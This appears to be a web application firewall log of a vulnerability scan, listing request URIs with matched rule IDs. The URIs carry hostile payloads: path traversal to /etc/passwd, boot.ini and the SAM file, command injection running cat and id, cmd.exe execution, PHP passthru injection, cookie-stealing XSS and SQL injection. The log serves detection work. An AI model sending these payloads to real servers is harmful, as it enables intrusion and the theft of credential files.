Packet [850]	Uri [/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [851]	Uri [/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [852]	Uri [/index.php?page=../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [853]	Uri [/index.php?page=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [856]	Uri [//indSensePostNotThereNoNo.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [1 ]	Signatures	[941180]
Packet [857]	Uri [/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [1 ]	Signatures	[941180]
Packet [865]	Uri [/internal.sws?../../winnt/win.ini]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [866]	Uri [/internal.sws?../../winnt/win.ini]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [867]	Uri [/interscan/cgi-bin/FtpSave.dll?I'm%20Here]	Nattacks [1 ]	Signatures	[920440]
Packet [890]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [891]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [892]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [893]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [894]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [898]	Uri [/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1127]	Uri [/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|]	Nattacks [13 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1128]	Uri [//logSensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1129]	Uri [/logicworks.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1133]	Uri [//LOGSensePostNotThereNoNo.PWD]	Nattacks [1 ]	Signatures	[920440]
Packet [1134]	Uri [/LOGIN.PWD]	Nattacks [1 ]	Signatures	[920440]
Packet [1139]	Uri [/logs/strSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1140]	Uri [/logs/str_err.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1142]	Uri [/mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;]	Nattacks [1 ]	Signatures	[942511]
Packet [1143]	Uri [/mall_log_files/ordSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1144]	Uri [/mall_log_files/order.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1156]	Uri [/mcartfree/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1157]	Uri [/mcartfree/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1158]	Uri [/megabook/files/20/setSensePostNotThereNoNop.db]	Nattacks [1 ]	Signatures	[920440]
Packet [1159]	Uri [/megabook/files/20/setup.db]	Nattacks [1 ]	Signatures	[920440]
Packet [1162]	Uri [/members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22]	Nattacks [5 ]	Signatures	[932100]	[942110]	[942430]	[942431]	[942511]
Packet [1163]	Uri [/metacart/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1164]	Uri [/metacart/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1165]	Uri [//midSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1166]	Uri [/midicart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1167]	Uri [/midicart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1168]	Uri [/MIDICART/midSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1169]	Uri [/MIDICART/midicart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1186]	Uri [/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1190]	Uri [/mpcsoftweb_guestbook/database/mpcSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1191]	Uri [/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1195]	Uri [/myinvoicer/config.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1196]	Uri [/mylog.phtml?screen=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1197]	Uri [/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent]	Nattacks [3 ]	Signatures	[941180]	[942431]	[942460]
Packet [1198]	Uri [/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=]	Nattacks [2 ]	Signatures	[942431]	[942460]
Packet [1199]	Uri [/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1200]	Uri [/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1206]	Uri [/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1207]	Uri [/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1208]	Uri [/news/newSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1209]	Uri [/news/news.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1210]	Uri [/newuser?Image=../../database/rbsserv.mdb]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1211]	Uri [/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1212]	Uri [/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1215]	Uri [/officescan/hotdownload/ofsSensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1216]	Uri [/officescan/hotdownload/ofscan.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1220]	Uri [/opendir.php?/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1221]	Uri [/opendir.php?requesturl=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1223]	Uri [/order/ordSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1224]	Uri [/order/ordSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1225]	Uri [/order/order_log_v12.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1226]	Uri [/order/order_log.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1227]	Uri [/orders/ordSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1228]	Uri [/orders/order_log_v12.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1229]	Uri [/Orders/ordSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1230]	Uri [/Orders/order_log_v12.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1231]	Uri [/orders/order_log.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1232]	Uri [/Orders/order_log.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1233]	Uri [/ows-bin/perlidlc.bat?&dir]	Nattacks [1 ]	Signatures	[920440]
Packet [1238]	Uri [/page.cgi?../../../../../../../../../../etc/passwd]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930120]	[932160]
Packet [1241]	Uri [/password.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1242]	Uri [/path/nw/article.php?id=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [1243]	Uri [/path/nw/article.php?id=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [1244]	Uri [/pccsmysqladm/incs/dbcSensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1245]	Uri [/pccsmysqladm/incs/dbconnect.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1246]	Uri [/PDG_Cart/odeSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1247]	Uri [/PDG_Cart/oder.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1248]	Uri [/PDG_Cart/shopper.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [1251]	Uri [/perl/-e%20%22system('cat%20/etc/passwd');\%22]	Nattacks [1 ]	Signatures	[933160]
Packet [1269]	Uri [//phpSensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1270]	Uri [/php.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1275]	Uri [/php/mylog.phtml?screen=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1276]	Uri [/php/mylog.phtml?screen=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1292]	Uri [/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1295]	Uri [/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\]	Nattacks [1 ]	Signatures	[932110]
Packet [1296]	Uri [/phprocketaddin/?page=../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1297]	Uri [/phprocketaddin/?page=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1300]	Uri [/phptonuke.php?filnavn=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1301]	Uri [/phpwebfilemgr/index.php?f=../../../../../../../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1302]	Uri [/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1303]	Uri [/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [1305]	Uri [/pls/sample/admin_/help/..%255cplsql.conf]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1340]	Uri [/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1346]	Uri [//pwdSensePostNotThereNoNod.db]	Nattacks [1 ]	Signatures	[920440]
Packet [1347]	Uri [//pwdSensePostNotThereNoNod.db]	Nattacks [1 ]	Signatures	[920440]
Packet [1348]	Uri [/pwd.db]	Nattacks [1 ]	Signatures	[920440]
Packet [1349]	Uri [//quiSensePostNotThereNoNo.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [1350]	Uri [/quikstore.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [1360]	Uri [/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1361]	Uri [/rtm.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1365]	Uri [/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1368]	Uri [/search.asp?term=<%00script>alert('Vulnerable')</script>]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[941100]	[941110]	[941160]	[942130]	[942370]	[942431]	[942460]	[942511]
Packet [1379]	Uri [/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service=]	Nattacks [5 ]	Signatures	[942110]	[942200]	[942260]	[942430]	[942431]
Packet [1380]	Uri [/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service=]	Nattacks [5 ]	Signatures	[942110]	[942200]	[942260]	[942430]	[942431]
Packet [1398]	Uri [/settings/site.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1399]	Uri [/shop/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1400]	Uri [/shop/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1401]	Uri [/shop/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1402]	Uri [/shop/member_html.cgi?file=;cat%20/etc/passwd|]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [1403]	Uri [/shop/member_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [1404]	Uri [/shop/member_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [1405]	Uri [/shop/normal_html.cgi?file=;cat%20/etc/passwd|]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [1406]	Uri [/shop/normal_html.cgi?file=../../../../../../etc/issue%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1407]	Uri [/shop/normal_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [1412]	Uri [/shoponline/fpdb/shoSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1413]	Uri [/shoponline/fpdb/shop.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1414]	Uri [/shopping/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1415]	Uri [/shopping/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1418]	Uri [//shoSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1419]	Uri [/shopping300.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1420]	Uri [/shopping400.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1421]	Uri [/shoppingdirectory/midSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1422]	Uri [/shoppingdirectory/midicart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1423]	Uri [/shoutbox.php?conf=../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1447]	Uri [//sqlSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1448]	Uri [/sqldump.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1449]	Uri [//sqlSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1450]	Uri [/sqlnet.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1458]	Uri [//strSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1459]	Uri [//strSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1460]	Uri [/structure.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1468]	Uri [/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1471]	Uri [/sysuser/docmgr/iecSensePostNotThereNoNo.stm/?template=..]	Nattacks [1 ]	Signatures	[930110]
Packet [1472]	Uri [/sysuser/docmgr/iecreate.stm?template=../]	Nattacks [1 ]	Signatures	[930110]
Packet [1473]	Uri [/sysuser/docmgr/ieeSensePostNotThereNoNo.stm/?url=..]	Nattacks [1 ]	Signatures	[930110]
Packet [1474]	Uri [/sysuser/docmgr/ieedit.stm?url=../]	Nattacks [1 ]	Signatures	[930110]
Packet [1494]	Uri [/typo3conf/datSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1495]	Uri [/typo3conf/database.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1501]	Uri [/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1508]	Uri [/vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [1509]	Uri [/vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [1562]	Uri [/vgn/login/1,501,,00.html?cookieName=x--\>]	Nattacks [2 ]	Signatures	[941180]	[942460]
Packet [1595]	Uri [/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1596]	Uri [/viewpage.php?file=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1597]	Uri [/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [1598]	Uri [/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [1603]	Uri [/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1604]	Uri [/web-console/ServerInfo.jsp%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [1609]	Uri [/web.config]	Nattacks [2 ]	Signatures	[920440]	[930130]
Packet [1614]	Uri [/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1637]	Uri [/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1638]	Uri [/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1643]	Uri [//ws_SensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1644]	Uri [/ws_ftp.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1645]	Uri [//WS_SensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1646]	Uri [/WS_FTP.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1649]	Uri [/wx/s.dll?d=/boot.ini]	Nattacks [2 ]	Signatures	[920440]	[930120]
Packet [1652]	Uri [/xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS]	Nattacks [1 ]	Signatures	[942260]
Packet [1655]	Uri [/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1657]	Uri [/file/../../../../../../../../etcSensePostNotThereNoNoetc/]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1658]	Uri [/file/../../../../../../../../etcSensePostNotThereNoNoetc/]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1659]	Uri [/file/../../../../../../../../etc/]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1686]	Uri [/_vti_bin/_vti_aut/autSensePostNotThereNoNo.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false]	Nattacks [1 ]	Signatures	[920440]
Packet [1687]	Uri [/_vti_bin/_vti_aut/autSensePostNotThereNoNo.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false]	Nattacks [1 ]	Signatures	[920440]
Packet [1688]	Uri [/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false]	Nattacks [1 ]	Signatures	[920440]
Packet [1691]	Uri [/_vti_bin/_vti_aut/dvwSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1692]	Uri [/_vti_bin/_vti_aut/dvwssr.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1693]	Uri [/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]	Nattacks [1 ]	Signatures	[920440]
Packet [1694]	Uri [/_vti_bin/_vti_aut/fp3SensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1695]	Uri [/_vti_bin/_vti_aut/fp3SensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1696]	Uri [/_vti_bin/_vti_aut/fp30reg.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1699]	Uri [/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1700]	Uri [/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1720]	Uri [/_vti_bin/shtSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1721]	Uri [/_vti_bin/shtml.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1743]	Uri [/_vti_pvt/admSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1744]	Uri [/_vti_pvt/administrators.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1745]	Uri [/_vti_pvt/autSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1746]	Uri [/_vti_pvt/authors.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1752]	Uri [/_vti_pvt/serSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1753]	Uri [/_vti_pvt/serSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1754]	Uri [/_vti_pvt/service.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1758]	Uri [/_vti_pvt/useSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1759]	Uri [/_vti_pvt/users.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1766]	Uri [/................../conSensePostNotThereNoNo.sys]	Nattacks [1 ]	Signatures	[920440]
Packet [1767]	Uri [/................../config.sys]	Nattacks [1 ]	Signatures	[920440]
Packet [1768]	Uri [/../../../../../../../../../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1769]	Uri [/../../../../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1770]	Uri [/../../../../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1771]	Uri [/../../../../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1772]	Uri [/..\\..\\..\\..\\..\\..\\..\\boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1774]	Uri [/%NETHOOD%/]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [1775]	Uri [/%NETHOOD%/]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [1808]	Uri [/blahb.ida]	Nattacks [1 ]	Signatures	[920440]
Packet [1809]	Uri [/blahb.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [1812]	Uri [/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1813]	Uri [/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1814]	Uri [/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1815]	Uri [/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1816]	Uri [/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1834]	Uri [/cgi-bin/snoSensePostNotThereNoNo.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1835]	Uri [/cgi-bin/snoSensePostNotThereNoNo.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1836]	Uri [/cgi-bin/snorkerz.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1837]	Uri [/cgi-bin/snoSensePostNotThereNoNo.cmd]	Nattacks [1 ]	Signatures	[920440]
Packet [1838]	Uri [/cgi-bin/snorkerz.cmd]	Nattacks [1 ]	Signatures	[920440]
Packet [1839]	Uri [/cgi-dos/argSensePostNotThereNoNo.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1840]	Uri [/cgi-dos/args.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1845]	Uri [/database/db2SensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
